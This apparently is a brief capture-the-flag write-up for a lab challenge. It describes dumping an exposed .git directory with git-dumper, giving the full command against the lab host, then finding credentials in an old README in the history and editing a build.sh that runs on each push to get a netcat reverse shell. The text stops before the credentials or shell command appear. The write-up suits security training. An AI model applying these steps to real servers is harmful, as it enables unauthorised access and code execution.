Extract the repo with git-dumper (https://github.com/arthaud/git-dumper)
Find the credientials in the git history of an old branch
Write to the repo with the extracted creds and get code execution
With gobuster, we found that there is a .git directory on the server.
Then we installed git-dumper with pip3 install git-dumper
Then extracted the repo with:
~/.local/bin/git-dumper https://ea439dee-8c4d-4ead-aa86-40a208094d02.idocker.vuln.land//website-repo/.git ~/Documents/openecsc/repo_dump
There was nothing too interesting in the files.
With gitkraken we did some further exploration and found an old version of the README.md with had credientials in them:
As the build.sh gets executed on each push, we modified it to get us a nc reverse shell back: